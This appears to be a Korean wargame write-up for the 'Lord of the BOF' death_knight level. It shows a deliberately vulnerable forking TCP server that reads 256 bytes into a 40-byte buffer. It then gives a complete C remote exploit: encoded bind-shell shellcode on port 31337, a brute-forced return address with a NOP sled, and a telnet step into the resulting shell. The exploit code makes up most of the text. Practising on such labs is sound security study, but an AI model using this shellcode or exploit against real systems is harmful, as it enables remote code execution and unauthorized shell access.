[bof 원정대] xavius -> death_knight (remote bof)

다음 문제의 소스입니다.

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark knight

        - remote BOF

*/

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <dumpcode.h>

main()

{

        char buffer[40];

        int server_fd, client_fd;

        struct sockaddr_in server_addr;

        struct sockaddr_in client_addr;

        int sin_size;

        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

                perror("socket");

                exit(1);

        }

        server_addr.sin_family = AF_INET;

        server_addr.sin_port = htons(6666);

        server_addr.sin_addr.s_addr = INADDR_ANY;

        bzero(&(server_addr.sin_zero), 8);

        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

                perror("bind");

                exit(1);

        }

        if(listen(server_fd, 10) == -1){

                perror("listen");

                exit(1);

        }

        while(1) {

                sin_size = sizeof(struct sockaddr_in);

                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

                        perror("accept");

                        continue;

                }

                if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }

                close(client_fd);

                while(waitpid(-1,NULL,WNOHANG) > 0);

        }

        close(server_fd);

}

 
exploit 코드

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <arpa/inet.h>

   

#define SA struct sockaddr

#define BUFSIZE 256

#define OFFSET 44

char bindport[] =

"\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01"

"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5"

"\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8"

"\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f"

"\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16"

"\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b"

"\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5"

"\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e"

"\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5";

#define BINDPORT 31337

   

   

int main (int argc, char *argv[])

{

int sockfd;

struct sockaddr_in target_addr;

unsigned char buffer[BUFSIZE];

unsigned int retaddr = 0xbffffff0;

char cmd[100];

   

if (argc != 3) {

fprintf(stderr, "Usage: %s <Target Address> <Port>\n", argv[0]);

return -1;

}

   

sprintf(cmd, "%s %s %d", "telnet", argv[1], BINDPORT);

   

while (1) {

   

if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {

perror ("socket error");

return -1;

}

memset(&target_addr, 0, sizeof(target_addr));

target_addr.sin_family = AF_INET;

target_addr.sin_port = htons(atoi(argv[2]));

target_addr.sin_addr.s_addr = inet_addr(argv[1]);

   

if (connect (sockfd, (SA*)&target_addr, sizeof(target_addr)) == -1) {

perror ("connect error");

close(sockfd);

continue;

}

retaddr -= 10;

memset(buffer, '\x90', sizeof(buffer));

memcpy(buffer+OFFSET, &retaddr, 4);

memcpy(buffer+100, bindport, strlen(bindport));

send(sockfd, buffer, strlen(buffer), 0);

system(cmd);

close(sockfd);

}

   

return 0;

}

 
bof 공격

 [그림 1] bof 공격

 
최종인증

 [그림 2] death_knight로 들어가서 나온 화면